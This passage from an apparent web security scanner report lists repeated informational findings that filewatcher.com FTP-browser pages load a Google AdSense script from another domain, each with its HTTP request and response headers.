src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.968. http://www.filewatcher.com/b/ftp/ftp.wh2.tu-dresden.de.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wh2.tu-dresden.de.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wh2.tu-dresden.de.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:34 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "P4XRE8QvSUJuUt13uQy2Bw"
Content-Length: 5271
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 747
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wh2.tu-dresden.de/ - FTP Bro
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.969. http://www.filewatcher.com/b/ftp/ftp.wh2.tu-dresden.de/pub.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wh2.tu-dresden.de/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wh2.tu-dresden.de/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:35 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "xhe+JP/x1ICxINj+UiZt+g"
Content-Length: 5632
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 747
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wh2.tu-dresden.de/pub/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.970. http://www.filewatcher.com/b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:35 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "tO6zK27Wu6U4dqXxOc+Krg"
Content-Length: 15658
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 749
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wh2.tu-dresden.de/pub/mirror
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.971. http://www.filewatcher.com/b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "DfwLl1HG/e7OBkEfrgUYSw"
Content-Length: 8503
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 756
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wh2.tu-dresden.de/pub/mirror
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.972. http://www.filewatcher.com/b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "xv5lRcKZsLoHCmxaAQKdOg"
Content-Length: 15052
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 758
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wh2.tu-dresden.de/pub/mirror
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.973. http://www.filewatcher.com/b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fIATpAtsxtCv9F+vPgUH3g"
Content-Length: 9950
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 757
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wh2.tu-dresden.de/pub/mirror
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.974. http://www.filewatcher.com/b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5/packages/i386.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5/packages/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5/packages/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ZCXt19xeV8mXaOXjSjB+iA"
Content-Length: 20292
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 758
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wh2.tu-dresden.de/pub/mirror
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.975. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wu-wien.ac.at.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "cBMN+6S4NvanP6qAYq13jQ"
Content-Length: 7484
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 722
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/ - FTP Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.976. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wu-wien.ac.at/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fVihhnoYb7vPhk1xHB4J+g"
Content-Length: 15712
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 724
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/ - FTP Bro
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.977. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wu-wien.ac.at/pub/systems.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:29 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Ny0WyoopoOVAy6pZQKPZ7g"
Content-Length: 9647
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 723
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.978. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:29 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "eeGpw5qbvrjLECItJelRBQ"
Content-Length: 10580
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 723
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/Op
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.979. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "KB5kler7WeBElU9lS1C3Dw"
Content-Length: 16362
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 736
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/Op
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.980. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "bq7VKL7QwCiJkEpjMt1zKA"
Content-Length: 9810
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 737
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/Op
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.981. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1/packages/alpha.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1/packages/alpha.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.1/packages/alpha.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "1mwyQnIf+X3PvEJ01iLCIA"
Content-Length: 47782
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 744
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/Op
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.982. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "s3HGM6EqoEa95cifl4klKQ"
Content-Length: 15961
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 724
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/Op
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.983. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "7CckzvKE7P2hIrrCjbrHdw"
Content-Length: 10166
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 730
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/Op
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.984. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3/packages/hppa.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3/packages/hppa.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD/4.3/packages/hppa.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:31 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "uxo7/vPMoxripOhfYIEApw"
Content-Length: 48516
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 733
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/Op
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
